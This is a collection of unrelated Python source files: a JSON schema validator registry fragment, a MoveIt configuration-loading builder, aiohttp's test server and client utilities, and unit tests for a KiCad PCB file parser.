JSONSchemaValidatorEae60Ece5110590E97DdD910E8144Ed2_v3_1_1()
self.json_schema_validators['jsd_eae98db0c24b5ecca77cce8279e20785_v3_1_1'] =\
JSONSchemaValidatorEae98Db0C24B5EccA77CCe8279E20785_v3_1_1()
self.json_schema_validators['jsd_f1ff2b82953f5131884f0779db37190c_v3_1_1'] =\
JSONSchemaValidatorF1Ff2B82953F5131884F0779Db37190C_v3_1_1()
self.json_schema_validators['jsd_f24049df29d059c48eef86d381ffad5d_v3_1_1'] =\
JSONSchemaValidatorF24049Df29D059C48Eef86D381Ffad5D_v3_1_1()
self.json_schema_validators['jsd_f46c01449d585b088490c4db530c56d5_v3_1_1'] =\
JSONSchemaValidatorF46C01449D585B088490C4Db530C56D5_v3_1_1()
self.json_schema_validators['jsd_f4dbfb874b3b56d7a651d6732f1bd55e_v3_1_1'] =\
JSONSchemaValidatorF4Dbfb874B3B56D7A651D6732F1Bd55E_v3_1_1()
self.json_schema_validators['jsd_f65b1178749c5f2399a9d2395591dade_v3_1_1'] =\
JSONSchemaValidatorF65B1178749C5F2399A9D2395591Dade_v3_1_1()
self.json_schema_validators['jsd_f7227b280b745b94bb801369b168a529_v3_1_1'] =\
JSONSchemaValidatorF7227B280B745B94Bb801369B168A529_v3_1_1()
self.json_schema_validators['jsd_f7253733d7025c8b8459478b159e84fc_v3_1_1'] =\
JSONSchemaValidatorF7253733D7025C8B8459478B159E84Fc_v3_1_1()
self.json_schema_validators['jsd_f757b04825bb5c29a1b3475aae870d04_v3_1_1'] =\
JSONSchemaValidatorF757B04825Bb5C29A1B3475Aae870D04_v3_1_1()
self.json_schema_validators['jsd_f92e61297eb05379bd9b92bc60735912_v3_1_1'] =\
JSONSchemaValidatorF92E61297Eb05379Bd9B92Bc60735912_v3_1_1()
self.json_schema_validators['jsd_fbd772420b8851349aa58fb4a9b006b8_v3_1_1'] =\
JSONSchemaValidatorFbd772420B8851349Aa58Fb4A9B006B8_v3_1_1()
self.json_schema_validators['jsd_fc44ec6afaf95ea9b51dd404abf46e4e_v3_1_1'] =\
JSONSchemaValidatorFc44Ec6AFaf95Ea9B51DD404Abf46E4E_v3_1_1()
| |
"""Simplify loading moveit config parameters.
This module provides builder-pattern based class to simplify loading moveit related parameters found in
robot_moveit_config package generated by moveit setup assistant.
By default it expects the following structure for the moveit configs package
robot_name_moveit_config/
.setup_assistant -> Used to retrieve information about the SRDF file and
the URDF file used when generating the package
config/
kinematics.yaml -> IK solver's parameters
joint_limits.yaml -> Overriding position/velocity/acceleration limits from the URDF file
moveit_cpp.yaml -> MoveItCpp related parameters
*_planning.yaml -> planning pipelines parameters
cartesian_limits.yaml -> Pilz planner parameters
# TODO(JafarAbdi): Check to see if this is a good default value
robot_name_controllers.yaml -> trajectory execution manager's parameters
...
Example:
moveit_configs = MoveItConfigsBuilder("robot_name").to_moveit_configs()
...
moveit_configs.package_path
moveit_configs.robot_description
moveit_configs.robot_description_semantic
moveit_configs.robot_description_kinematics
moveit_configs.planning_pipelines
moveit_configs.trajectory_execution
moveit_configs.planning_scene_monitor
moveit_configs.move_group_capabilities
moveit_configs.joint_limits
moveit_configs.moveit_cpp
moveit_configs.cartesian_limits
# Or to get all the parameters as a dictionary
moveit_configs.to_dict()
Each function in MoveItConfigsBuilder has a file_path as an argument which is used to override the default
path for the file
Example:
moveit_configs = MoveItConfigsBuilder("robot_name")
# Relative to robot_name_moveit_configs
.robot_description_semantic(Path("my_config") / "my_file.srdf")
.to_moveit_configs()
# Or
moveit_configs = MoveItConfigsBuilder("robot_name")
# Absolute path to robot_name_moveit_config
.robot_description_semantic(Path.home() / "my_config" / "new_file.srdf")
.to_moveit_configs()
"""
from pathlib import Path
from typing import Optional, List
import logging
import re
from ament_index_python.packages import get_package_share_directory
from launch_param_builder import ParameterBuilder, load_yaml, load_xacro
moveit_configs_utils_path = Path(get_package_share_directory("moveit_configs_utils"))
def get_pattern_matches(folder, pattern):
"""Given all the files in the folder, find those that match the pattern.
If there are groups defined, the groups are returned. Otherwise the path to the matches are returned.
"""
matches = []
if not folder.exists():
return matches
for child in folder.iterdir():
if not child.is_file():
continue
m = pattern.search(child.name)
if m:
groups = m.groups()
if groups:
matches.append(groups[0])
else:
matches.append(child)
return matches
class MoveItConfigs(object):
"""Class containing MoveIt related parameters."""
__slots__ = [
"__package_path",
"__robot_description",
"__robot_description_semantic",
"__robot_description_kinematics",
"__planning_pipelines",
"__trajectory_execution",
"__planning_scene_monitor",
"__move_group_capabilities",
"__joint_limits",
"__moveit_cpp",
"__cartesian_limits",
]
def __init__(self):
# A pathlib Path to the moveit config package
self.package_path = None
# A dictionary that has the contents of the URDF file.
self.robot_description = {}
# A dictionary that has the contents of the SRDF file.
self.robot_description_semantic = {}
# A dictionary IK solver specific parameters.
self.robot_description_kinematics = {}
# A dictionary that contains the planning pipelines parameters.
self.planning_pipelines = {}
# A dictionary contains parameters for trajectory execution & moveit controller managers.
self.trajectory_execution = {}
# A dictionary that have the planning scene monitor's parameters.
self.planning_scene_monitor = {}
# A dictionary containing move_group's non-default capabilities.
self.move_group_capabilities = {}
# A dictionary containing the overridden position/velocity/acceleration limits.
self.joint_limits = {}
# A dictionary containing MoveItCpp related parameters.
self.moveit_cpp = {}
# A dictionary containing the cartesian limits for the Pilz planner.
self.cartesian_limits = {}
@property
def package_path(self):
return self.__package_path
@package_path.setter
def package_path(self, value):
self.__package_path = value
@property
def robot_description(self):
return self.__robot_description
@robot_description.setter
def robot_description(self, value):
self.__robot_description = value
@property
def robot_description_semantic(self):
return self.__robot_description_semantic
@robot_description_semantic.setter
def robot_description_semantic(self, value):
self.__robot_description_semantic = value
@property
def robot_description_kinematics(self):
return self.__robot_description_kinematics
@robot_description_kinematics.setter
def robot_description_kinematics(self, value):
self.__robot_description_kinematics = value
@property
def planning_pipelines(self):
return self.__planning_pipelines
@planning_pipelines.setter
def planning_pipelines(self, value):
self.__planning_pipelines = value
@property
def trajectory_execution(self):
return self.__trajectory_execution
@trajectory_execution.setter
def trajectory_execution(self, value):
self.__trajectory_execution = value
@property
def planning_scene_monitor(self):
return self.__planning_scene_monitor
@planning_scene_monitor.setter
def planning_scene_monitor(self, value):
self.__planning_scene_monitor = value
@property
def move_group_capabilities(self):
return self.__move_group_capabilities
@move_group_capabilities.setter
def move_group_capabilities(self, value):
self.__move_group_capabilities = value
@property
def joint_limits(self):
return self.__joint_limits
@joint_limits.setter
def joint_limits(self, value):
self.__joint_limits = value
@property
def moveit_cpp(self):
return self.__moveit_cpp
@moveit_cpp.setter
def moveit_cpp(self, value):
self.__moveit_cpp = value
@property
def cartesian_limits(self):
return self.__cartesian_limits
@cartesian_limits.setter
def cartesian_limits(self, value):
self.__cartesian_limits = value
def to_dict(self):
parameters = {}
parameters.update(self.robot_description)
parameters.update(self.robot_description_semantic)
parameters.update(self.robot_description_kinematics)
parameters.update(self.planning_pipelines)
parameters.update(self.trajectory_execution)
parameters.update(self.planning_scene_monitor)
parameters.update(self.joint_limits)
parameters.update(self.moveit_cpp)
parameters.update(self.cartesian_limits)
return parameters
class MoveItConfigsBuilder(ParameterBuilder):
__moveit_configs = MoveItConfigs()
__robot_name: str
__urdf_package: Path
# Relative path of the URDF file w.r.t. __urdf_package
__urdf_file_path: Path
# Relative path of the SRDF file w.r.t. robot_name_moveit_config
__srdf_file_path: Path
# String specify the parameter name that the robot description will be loaded to, it will also be used as a prefix
# for "_planning", "_semantic", and "_kinematics"
__robot_description: str
__config_dir_path = Path("config")
# Look-up for robot_name_moveit_config package
def __init__(self, robot_name: str, robot_description="robot_description"):
super().__init__(robot_name + "_moveit_config")
self.__moveit_configs.package_path = self._package_path
self.__robot_name = robot_name
setup_assistant_file = self._package_path / ".setup_assistant"
if not setup_assistant_file.exists():
logging.warning(
f"\x1b[33;21mPackage `{self._package_path}` doesn't have `.setup_assistant` file "
f"-- using config/{robot_name}.urdf and config/{robot_name}.srdf\x1b[0m"
)
self.__urdf_package = self._package_path
self.__urdf_file_path = self.__config_dir_path / (
self.__robot_name + ".urdf"
)
self.__srdf_file_path = self.__config_dir_path / (
self.__robot_name + ".srdf"
)
else:
setup_assistant_yaml = load_yaml(setup_assistant_file)
self.__urdf_package = Path(
get_package_share_directory(
setup_assistant_yaml["moveit_setup_assistant_config"]["URDF"][
"package"
]
)
)
self.__urdf_file_path = Path(
setup_assistant_yaml["moveit_setup_assistant_config"]["URDF"][
"relative_path"
]
)
self.__srdf_file_path = Path(
setup_assistant_yaml["moveit_setup_assistant_config"]["SRDF"][
"relative_path"
]
)
self.__robot_description = robot_description
def robot_description(self, file_path: Optional[str] = None, mappings: dict = None):
"""Load robot description.
:param file_path: Absolute or relative path to the URDF file (w.r.t. robot_name_moveit_config).
:param mappings: mappings to be passed when loading the xacro file.
:return: Instance of MoveItConfigsBuilder with robot_description loaded.
"""
if file_path is None:
robot_description_file_path = self.__urdf_package / self.__urdf_file_path
else:
robot_description_file_path = self._package_path / file_path
self.__moveit_configs.robot_description = {
self.__robot_description: load_xacro(
robot_description_file_path, mappings=mappings
)
}
return self
def robot_description_semantic(
self, file_path: Optional[str] = None, mappings: dict = None
):
"""Load semantic robot description.
:param file_path: Absolute or relative path to the SRDF file (w.r.t. robot_name_moveit_config).
:param mappings: mappings to be passed when loading the xacro file.
:return: Instance of MoveItConfigsBuilder with robot_description_semantic loaded.
"""
self.__moveit_configs.robot_description_semantic = {
self.__robot_description
+ "_semantic": load_xacro(
self._package_path / (file_path or self.__srdf_file_path),
mappings=mappings,
)
}
return self
def robot_description_kinematics(self, file_path: Optional[str] = None):
"""Load IK solver parameters.
:param file_path: Absolute or relative path to the kinematics yaml file (w.r.t. robot_name_moveit_config).
:return: Instance of MoveItConfigsBuilder with robot_description_kinematics loaded.
"""
self.__moveit_configs.robot_description_kinematics = {
self.__robot_description
+ "_kinematics": load_yaml(
self._package_path
/ (file_path or self.__config_dir_path / "kinematics.yaml")
)
}
return self
def joint_limits(self, file_path: Optional[str] = None):
"""Load joint limits overrides.
:param file_path: Absolute or relative path to the joint limits yaml file (w.r.t. robot_name_moveit_config).
:return: Instance of MoveItConfigsBuilder with robot_description_planning loaded.
"""
self.__moveit_configs.joint_limits = {
self.__robot_description
+ "_planning": load_yaml(
self._package_path
/ (file_path or self.__config_dir_path / "joint_limits.yaml")
)
}
return self
def moveit_cpp(self, file_path: Optional[str] = None):
"""Load MoveItCpp parameters.
:param file_path: Absolute or relative path to the MoveItCpp yaml file (w.r.t. robot_name_moveit_config).
:return: Instance of MoveItConfigsBuilder with moveit_cpp loaded.
"""
self.__moveit_configs.moveit_cpp = load_yaml(
self._package_path
/ (file_path or self.__config_dir_path / "moveit_cpp.yaml")
)
return self
def trajectory_execution(
self,
file_path: Optional[str] = None,
moveit_manage_controllers: bool = True,
):
"""Load trajectory execution and moveit controller managers' parameters
:param file_path: Absolute or relative path to the controllers yaml file (w.r.t. robot_name_moveit_config).
:param moveit_manage_controllers: Whether trajectory execution manager is allowed to switch controllers' states.
:return: Instance of MoveItConfigsBuilder with trajectory_execution loaded.
"""
self.__moveit_configs.trajectory_execution = {
"moveit_manage_controllers": moveit_manage_controllers,
}
# Find the most likely controller params as needed
if file_path is None:
config_folder = self._package_path / self.__config_dir_path
controller_pattern = re.compile("^(.*)_controllers.yaml$")
possible_names = get_pattern_matches(config_folder, controller_pattern)
if not possible_names:
raise RuntimeError(
"trajectory_execution: `Parameter file_path is undefined "
f"and no matches for {config_folder}/*_controllers.yaml"
)
else:
chosen_name = None
if len(possible_names) == 1:
chosen_name = possible_names[0]
else:
# Try a couple other common names, in order of precedence
for name in ["moveit", "moveit2", self.__robot_name]:
if name in possible_names:
chosen_name = name
break
else:
option_str = "\n - ".join(
name + "_controllers.yaml" for name in possible_names
)
raise RuntimeError(
"trajectory_execution: "
f"Unable to guess which parameter file to load. Options:\n - {option_str}"
)
file_path = config_folder / (chosen_name + "_controllers.yaml")
else:
file_path = self._package_path / file_path
self.__moveit_configs.trajectory_execution.update(load_yaml(file_path))
return self
def planning_scene_monitor(
self,
publish_planning_scene: bool = True,
publish_geometry_updates: bool = True,
publish_state_updates: bool = True,
publish_transforms_updates: bool = True,
):
self.__moveit_configs.planning_scene_monitor = {
# TODO: Fix parameter namespace upstream -- see planning_scene_monitor.cpp:262
# "planning_scene_monitor": {
"publish_planning_scene": publish_planning_scene,
"publish_geometry_updates": publish_geometry_updates,
"publish_state_updates": publish_state_updates,
"publish_transforms_updates": publish_transforms_updates,
# }
}
return self
def planning_pipelines(
self,
default_planning_pipeline: str = None,
pipelines: List[str] = None,
load_all: bool = True,
):
"""Load planning pipelines parameters.
:param default_planning_pipeline: Name of the default planning pipeline.
:param pipelines: List of the planning pipelines to be loaded.
:param load_all: Only used if pipelines is None.
If true, loads all pipelines defined in | |
"""Utilities shared by tests."""
import asyncio
import contextlib
import functools
import gc
import inspect
import os
import socket
import sys
import unittest
from abc import ABC, abstractmethod
from types import TracebackType
from typing import ( # noqa
TYPE_CHECKING,
Any,
Callable,
Iterator,
List,
Optional,
Type,
Union,
)
from unittest import mock
from multidict import CIMultiDict, CIMultiDictProxy
from yarl import URL
import aiohttp
from aiohttp.client import (
ClientResponse,
_RequestContextManager,
_WSRequestContextManager,
)
from . import ClientSession, hdrs
from .abc import AbstractCookieJar
from .client_reqrep import ClientResponse # noqa
from .client_ws import ClientWebSocketResponse # noqa
from .helpers import sentinel
from .http import HttpVersion, RawRequestMessage
from .signals import Signal
from .web import (
Application,
AppRunner,
BaseRunner,
Request,
Server,
ServerRunner,
SockSite,
UrlMappingMatchInfo,
)
from .web_protocol import _RequestHandler
if TYPE_CHECKING: # pragma: no cover
from ssl import SSLContext
else:
SSLContext = None
REUSE_ADDRESS = os.name == "posix" and sys.platform != "cygwin"
def get_unused_port_socket(host: str) -> socket.socket:
return get_port_socket(host, 0)
def get_port_socket(host: str, port: int) -> socket.socket:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if REUSE_ADDRESS:
# Windows has different semantics for SO_REUSEADDR,
# so don't set it. Ref:
# https://docs.microsoft.com/en-us/windows/win32/winsock/using-so-reuseaddr-and-so-exclusiveaddruse
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
return s
def unused_port() -> int:
"""Return a port that is unused on the current host."""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(("127.0.0.1", 0))
return s.getsockname()[1]
class BaseTestServer(ABC):
__test__ = False
def __init__(
self,
*,
scheme: Union[str, object] = sentinel,
loop: Optional[asyncio.AbstractEventLoop] = None,
host: str = "127.0.0.1",
port: Optional[int] = None,
skip_url_asserts: bool = False,
**kwargs: Any,
) -> None:
self._loop = loop
self.runner = None # type: Optional[BaseRunner]
self._root = None # type: Optional[URL]
self.host = host
self.port = port
self._closed = False
self.scheme = scheme
self.skip_url_asserts = skip_url_asserts
async def start_server(
self, loop: Optional[asyncio.AbstractEventLoop] = None, **kwargs: Any
) -> None:
if self.runner:
return
self._loop = loop
self._ssl = kwargs.pop("ssl", None)
self.runner = await self._make_runner(**kwargs)
await self.runner.setup()
if not self.port:
self.port = 0
_sock = get_port_socket(self.host, self.port)
self.host, self.port = _sock.getsockname()[:2]
site = SockSite(self.runner, sock=_sock, ssl_context=self._ssl)
await site.start()
server = site._server
assert server is not None
sockets = server.sockets
assert sockets is not None
self.port = sockets[0].getsockname()[1]
if self.scheme is sentinel:
if self._ssl:
scheme = "https"
else:
scheme = "http"
self.scheme = scheme
self._root = URL(f"{self.scheme}://{self.host}:{self.port}")
@abstractmethod # pragma: no cover
async def _make_runner(self, **kwargs: Any) -> BaseRunner:
pass
def make_url(self, path: str) -> URL:
assert self._root is not None
url = URL(path)
if not self.skip_url_asserts:
assert not url.is_absolute()
return self._root.join(url)
else:
return URL(str(self._root) + path)
@property
def started(self) -> bool:
return self.runner is not None
@property
def closed(self) -> bool:
return self._closed
@property
def handler(self) -> Server:
# for backward compatibility
# web.Server instance
runner = self.runner
assert runner is not None
assert runner.server is not None
return runner.server
async def close(self) -> None:
"""Close all fixtures created by the test client.
After that point, the TestClient is no longer usable.
This is an idempotent function: running close multiple times
will not have any additional effects.
close is also run when the object is garbage collected, and on
exit when used as a context manager.
"""
if self.started and not self.closed:
assert self.runner is not None
await self.runner.cleanup()
self._root = None
self.port = None
self._closed = True
def __enter__(self) -> None:
raise TypeError("Use async with instead")
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> None:
# __exit__ should exist in pair with __enter__ but never executed
pass # pragma: no cover
async def __aenter__(self) -> "BaseTestServer":
await self.start_server(loop=self._loop)
return self
async def __aexit__(
self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> None:
await self.close()
class TestServer(BaseTestServer):
def __init__(
self,
app: Application,
*,
scheme: Union[str, object] = sentinel,
host: str = "127.0.0.1",
port: Optional[int] = None,
**kwargs: Any,
):
self.app = app
super().__init__(scheme=scheme, host=host, port=port, **kwargs)
async def _make_runner(self, **kwargs: Any) -> BaseRunner:
return AppRunner(self.app, **kwargs)
class RawTestServer(BaseTestServer):
def __init__(
self,
handler: _RequestHandler,
*,
scheme: Union[str, object] = sentinel,
host: str = "127.0.0.1",
port: Optional[int] = None,
**kwargs: Any,
) -> None:
self._handler = handler
super().__init__(scheme=scheme, host=host, port=port, **kwargs)
async def _make_runner(self, debug: bool = True, **kwargs: Any) -> ServerRunner:
srv = Server(self._handler, loop=self._loop, debug=debug, **kwargs)
return ServerRunner(srv, debug=debug, **kwargs)
class TestClient:
"""
A test client implementation.
To write functional tests for aiohttp based servers.
"""
__test__ = False
def __init__(
self,
server: BaseTestServer,
*,
cookie_jar: Optional[AbstractCookieJar] = None,
loop: Optional[asyncio.AbstractEventLoop] = None,
**kwargs: Any,
) -> None:
if not isinstance(server, BaseTestServer):
raise TypeError(
"server must be TestServer " "instance, found type: %r" % type(server)
)
self._server = server
self._loop = loop
if cookie_jar is None:
cookie_jar = aiohttp.CookieJar(unsafe=True, loop=loop)
self._session = ClientSession(loop=loop, cookie_jar=cookie_jar, **kwargs)
self._closed = False
self._responses = [] # type: List[ClientResponse]
self._websockets = [] # type: List[ClientWebSocketResponse]
async def start_server(self) -> None:
await self._server.start_server(loop=self._loop)
@property
def host(self) -> str:
return self._server.host
@property
def port(self) -> Optional[int]:
return self._server.port
@property
def server(self) -> BaseTestServer:
return self._server
@property
def app(self) -> Application:
return getattr(self._server, "app", None)
@property
def session(self) -> ClientSession:
"""An internal aiohttp.ClientSession.
Unlike the methods on the TestClient, client session requests
do not automatically include the host in the url queried, and
will require an absolute path to the resource.
"""
return self._session
def make_url(self, path: str) -> URL:
return self._server.make_url(path)
async def _request(self, method: str, path: str, **kwargs: Any) -> ClientResponse:
resp = await self._session.request(method, self.make_url(path), **kwargs)
# save it to close later
self._responses.append(resp)
return resp
def request(self, method: str, path: str, **kwargs: Any) -> _RequestContextManager:
"""Routes a request to tested http server.
The interface is identical to aiohttp.ClientSession.request,
except the loop kwarg is overridden by the instance used by the
test server.
"""
return _RequestContextManager(self._request(method, path, **kwargs))
def get(self, path: str, **kwargs: Any) -> _RequestContextManager:
"""Perform an HTTP GET request."""
return _RequestContextManager(self._request(hdrs.METH_GET, path, **kwargs))
def post(self, path: str, **kwargs: Any) -> _RequestContextManager:
"""Perform an HTTP POST request."""
return _RequestContextManager(self._request(hdrs.METH_POST, path, **kwargs))
def options(self, path: str, **kwargs: Any) -> _RequestContextManager:
"""Perform an HTTP OPTIONS request."""
return _RequestContextManager(self._request(hdrs.METH_OPTIONS, path, **kwargs))
def head(self, path: str, **kwargs: Any) -> _RequestContextManager:
"""Perform an HTTP HEAD request."""
return _RequestContextManager(self._request(hdrs.METH_HEAD, path, **kwargs))
def put(self, path: str, **kwargs: Any) -> _RequestContextManager:
"""Perform an HTTP PUT request."""
return _RequestContextManager(self._request(hdrs.METH_PUT, path, **kwargs))
def patch(self, path: str, **kwargs: Any) -> _RequestContextManager:
"""Perform an HTTP PATCH request."""
return _RequestContextManager(self._request(hdrs.METH_PATCH, path, **kwargs))
def delete(self, path: str, **kwargs: Any) -> _RequestContextManager:
"""Perform an HTTP PATCH request."""
return _RequestContextManager(self._request(hdrs.METH_DELETE, path, **kwargs))
def ws_connect(self, path: str, **kwargs: Any) -> _WSRequestContextManager:
"""Initiate websocket connection.
The api corresponds to aiohttp.ClientSession.ws_connect.
"""
return _WSRequestContextManager(self._ws_connect(path, **kwargs))
async def _ws_connect(self, path: str, **kwargs: Any) -> ClientWebSocketResponse:
ws = await self._session.ws_connect(self.make_url(path), **kwargs)
self._websockets.append(ws)
return ws
async def close(self) -> None:
"""Close all fixtures created by the test client.
After that point, the TestClient is no longer usable.
This is an idempotent function: running close multiple times
will not have any additional effects.
close is also run on exit when used as a(n) (asynchronous)
context manager.
"""
if not self._closed:
for resp in self._responses:
resp.close()
for ws in self._websockets:
await ws.close()
await self._session.close()
await self._server.close()
self._closed = True
def __enter__(self) -> None:
raise TypeError("Use async with instead")
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc: Optional[BaseException],
tb: Optional[TracebackType],
) -> None:
# __exit__ should exist in pair with __enter__ but never executed
pass # pragma: no cover
async def __aenter__(self) -> "TestClient":
await self.start_server()
return self
async def __aexit__(
self,
exc_type: Optional[Type[BaseException]],
exc: Optional[BaseException],
tb: Optional[TracebackType],
) -> None:
await self.close()
class AioHTTPTestCase(unittest.TestCase):
"""A base class to allow for unittest web applications using
aiohttp.
Provides the following:
* self.client (aiohttp.test_utils.TestClient): an aiohttp test client.
* self.loop (asyncio.BaseEventLoop): the event loop in which the
application and server are running.
* self.app (aiohttp.web.Application): the application returned by
self.get_application()
Note that the TestClient's methods are asynchronous: you have to
execute function on the test client using asynchronous methods.
"""
async def get_application(self) -> Application:
"""
This method should be overridden
to return the aiohttp.web.Application
object to test.
"""
return self.get_app()
def get_app(self) -> Application:
"""Obsolete method used to constructing web application.
Use .get_application() coroutine instead
"""
raise RuntimeError("Did you forget to define get_application()?")
| |
<gh_stars>0
import sys
import unittest
from sys import path
from unittest.mock import patch
from nukleus.ModelBase import *
from nukleus.Schema import Schema
from nukleus.ModelPcb import *
from nukleus.ParserVisitor import ParserVisitor
from nukleus.PCB import PCB
from nukleus.SexpParser import *
sys.path.append('src')
sys.path.append('../../src')
class TestModelPcb(unittest.TestCase):
def test_parse_general(self):
INPUT_STRINGG = """ (general
(thickness 1.6)
(drawings 4)
(tracks 253)
(zones 0)
(modules 37)
(nets 25)
)"""
sexp_str = load_tree(INPUT_STRINGG)
pcb = PCB()
visitor = ParserVisitor(pcb)
with patch.object(PCB, 'visitPcbGeneral', return_value=None) as mock_method:
text_effects = visitor.node('general', sexp_str)
mock_method.assert_called_once_with(PcbGeneral(
thickness='1.6',
drawings='4',
tracks='253',
zones='0',
modules='37',
nets='25'
))
def test_parse_setup(self):
sexp_str = load_tree(""" (setup
(stackup
(layer "F.SilkS" (type "Top Silk Screen") (color "White"))
(layer "F.Paste" (type "Top Solder Paste"))
(layer "F.Mask" (type "Top Solder Mask") (color "Green") (thickness 0.01))
(layer "F.Cu" (type "copper") (thickness 0.035))
(layer "dielectric 1" (type "core") (thickness 0.480066) (material "FR4") (epsilon_r 4.5) (loss_tangent 0.02))
(layer "In1.Cu" (type "copper") (thickness 0.035))
(layer "dielectric 2" (type "prepreg") (thickness 0.480066) (material "FR4") (epsilon_r 4.5) (loss_tangent 0.02))
(layer "In2.Cu" (type "copper") (thickness 0.035))
(layer "dielectric 3" (type "core") (thickness 0.480066) (material "FR4") (epsilon_r 4.5) (loss_tangent 0.02))
(layer "B.Cu" (type "copper") (thickness 0.035))
(layer "B.Mask" (type "Bottom Solder Mask") (color "Green") (thickness 0.01))
(layer "B.Paste" (type "Bottom Solder Paste"))
(layer "B.SilkS" (type "Bottom Silk Screen") (color "White"))
(copper_finish "HAL lead-free")
(dielectric_constraints no)
)
(pad_to_mask_clearance 0)
(aux_axis_origin 40.9 173.1)
(pcbplotparams
(layerselection 0x00010fc_ffffffff)
(disableapertmacros false)
(usegerberextensions false)
(usegerberattributes true)
(usegerberadvancedattributes true)
(creategerberjobfile true)
(svguseinch false)
(svgprecision 6)
(excludeedgelayer false)
(plotframeref false)
(viasonmask false)
(mode 1)
(useauxorigin false)
(hpglpennumber 1)
(hpglpenspeed 20)
(hpglpendiameter 15.000000)
(dxfpolygonmode true)
(dxfimperialunits true)
(dxfusepcbnewfont true)
(psnegative false)
(psa4output false)
(plotreference true)
(plotvalue true)
(plotinvisibletext false)
(sketchpadsonfab false)
(subtractmaskfromsilk false)
(outputformat 1)
(mirror false)
(drillshape 0)
(scaleselection 1)
(outputdirectory "plots")
)
)""")
pcb = PCB()
visitor = ParserVisitor(pcb)
with patch.object(PCB, 'visitPcbSetup', return_value=None) as mock_method:
text_effects = visitor.node('setup', sexp_str)
mock_method.assert_called_once_with(PcbSetup(stackup_settings=StackupSettings(layers=[
StackUpLayerSettings(name='F.SilkS', number='0', type='Top Silk Screen', color='White', thickness='', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='F.Paste', number='0', type='Top Solder Paste', color='', thickness='', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='F.Mask', number='0', type='Top Solder Mask', color='Green', thickness='0.01', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='F.Cu', number='0', type='copper', color='', thickness='0.035', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='dielectric 1', number='0', type='core', color='', thickness='0.480066', material='FR4', epsilon_r='4.5', loss_tangent='0.02'),
StackUpLayerSettings(name='In1.Cu', number='0', type='copper', color='', thickness='0.035', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='dielectric 2', number='0', type='prepreg', color='', thickness='0.480066', material='FR4', epsilon_r='4.5', loss_tangent='0.02'),
StackUpLayerSettings(name='In2.Cu', number='0', type='copper', color='', thickness='0.035', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='dielectric 3', number='0', type='core', color='', thickness='0.480066', material='FR4', epsilon_r='4.5', loss_tangent='0.02'),
StackUpLayerSettings(name='B.Cu', number='0', type='copper', color='', thickness='0.035', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='B.Mask', number='0', type='Bottom Solder Mask', color='Green', thickness='0.01', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='B.Paste', number='0', type='Bottom Solder Paste', color='', thickness='', material='', epsilon_r='', loss_tangent=''),
StackUpLayerSettings(name='B.SilkS', number='0', type='Bottom Silk Screen', color='White', thickness='', material='', epsilon_r='', loss_tangent='')
], copper_finish='HAL lead-free', dielectric_constraints='no', edge_connector='', castellated_pads='', edge_plating=''),
plot_settings=PlotSettings(
layerselection='0x00010fc_ffffffff', disableapertmacros='false', usegerberextensions='false',
usegerberattributes='true', usegerberadvancedattributes='true', creategerberjobfile='true',
svguseinch='false', svgprecision='6', excludeedgelayer='false', plotframeref='false',
viasonmask='false', mode='1', useauxorigin='false', hpglpennumber='1', hpglpenspeed='20',
hpglpendiameter='15.000000', dxfpolygonmode='true', dxfimperialunits='true', dxfusepcbnewfont='true',
psnegative='false', psa4output='false', plotreference='true', plotvalue='true',
plotinvisibletext='false', sketchpadsonfab='false', subtractmaskfromsilk='false',
outputformat='1', mirror='false', drillshape='0', scaleselection='1', outputdirectory='plots'),
pad_to_mask_clearance='0', solder_mask_min_width='', pad_to_paste_clearance='',
pad_to_paste_clearance_ratio='', aux_axis_origin=[40.9, 173.1], grid_origin=[], copper_finish='',
dielectric_constraints='', edge_connector='', castellated_pads='', edge_plating=''))
def test_parse_layers(self):
INPUT_STRINGG = """ (layers
(0 "F.Cu" signal)
)"""
sexp_str = load_tree(INPUT_STRINGG)
pcb = PCB()
visitor = ParserVisitor(pcb)
with patch.object(PCB, 'visitLayer', return_value=None) as mock_method:
text_effects = visitor.node('layers', sexp_str)
mock_method.assert_called_once_with(PcbLayer(
ordinal=0, canonical_name='F.Cu', type='signal', user_name=''))
def test_parse_segment(self):
INPUT_STRINGG = """ (segment (start 61.976 103.124) (end 62.775999 103.923999) (width 0.381) (layer "F.Cu") (net 1) (tstamp 9208ea78-8dde-4b3d-91e9-5755ab5efd9a))"""
sexp_str = load_tree(INPUT_STRINGG)
pcb = PCB()
visitor = ParserVisitor(pcb)
with patch.object(PCB, 'visitSegment', return_value=None) as mock_method:
text_effects = visitor.node('segment', sexp_str)
mock_method.assert_called_once_with(TrackSegment(
start=(61.976, 103.124),
end=(62.775999, 103.923999),
width=0.381,
layer='F.Cu',
locked=False,
net=1,
tstamp='9208ea78-8dde-4b3d-91e9-5755ab5efd9a'))
def test_parse_segment_locked(self):
INPUT_STRINGG = """ (segment locked (start 61.976 103.124) (end 62.775999 103.923999) (width 0.381) (layer "F.Cu") (net 1) (tstamp 9208ea78-8dde-4b3d-91e9-5755ab5efd9a))"""
sexp_str = load_tree(INPUT_STRINGG)
pcb = PCB()
visitor = ParserVisitor(pcb)
with patch.object(PCB, 'visitSegment', return_value=None) as mock_method:
text_effects = visitor.node('segment', sexp_str)
mock_method.assert_called_once_with(TrackSegment(
start=(61.976, 103.124),
end=(62.775999, 103.923999),
width=0.381,
layer='F.Cu',
locked=True,
net=1,
tstamp='9208ea78-8dde-4b3d-91e9-5755ab5efd9a'))
def test_parse_via(self):
INPUT_STRINGG = """ (via (at 69.088 112.776) (size 0.8) (drill 0.4) (layers "F.Cu" "B.Cu") (net 23) (tstamp f220d6a7-3170-4e04-8de6-2df0c3962fe0))"""
sexp_str = load_tree(INPUT_STRINGG)
